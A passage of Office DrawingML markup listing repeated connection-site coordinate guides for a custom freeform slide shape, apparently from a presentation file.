              <a:gd name="connsiteX80" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 463335 w 1349253"/>
